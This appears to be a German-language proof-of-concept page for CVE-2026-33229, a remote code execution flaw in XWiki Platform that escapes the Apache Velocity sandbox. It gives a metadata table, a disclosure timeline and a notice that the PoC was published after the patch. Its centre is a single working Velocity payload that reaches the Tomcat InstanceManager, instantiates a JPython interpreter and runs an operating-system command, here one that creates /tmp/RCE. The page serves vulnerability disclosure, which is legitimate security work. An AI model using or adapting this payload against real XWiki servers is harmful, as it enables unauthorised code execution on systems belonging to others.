
Proof-of-Concept-Exploit für CVE-2026-33229, eine XWiki-RCE über die Umgehung der Apache-Velocity-Sandbox, mit technischen Details und einem funktionierenden Payload.
Eine Remote-Code-Execution-Schwachstelle in der XWiki Platform, die es einem authentifizierten Benutzer mit Skriptberechtigungen ermöglicht, die Apache-Velocity-Sandbox vollständig zu umgehen — ohne Java-Reflection — indem vorinstanziierte Objekte durchlaufen werden, die bereits im Velocity-Kontext vorhanden sind.
📄 Vollständige technische Details: youssefazefzaf.com/posts/cve
| Feld | Wert |
|---|
| CVE-ID | CVE-2026-33229 |
| Betroffenes Produkt | XWiki Platform |
| Komponente | Velocity-Makro-Renderer, Seiten-Titel-Parameter |
| Erforderliche Berechtigungen | Authentifiziert + Skriptberechtigung |
| Auswirkung | Remote Code Execution |
| GHSA | GHSA-h259-74h5-4rh9 |
| Entdeckt | 7. November 2025 |
| Gepatcht | 10. Dezember 2025 |
| Offengelegt | 8. April 2026 |
$request.request.getServletContext().getAttribute("org.apache.tomcat.InstanceManager").newInstance("org.apache.batik.script.jpython.JPythonInterpreter").evaluate("import os; os.system('touch /tmp/RCE')")
Hinweis zur verantwortungsvollen Offenlegung: PoC nach Verfügbarkeit des Patches veröffentlicht. Nicht gegen Systeme verwenden, die dir nicht gehören.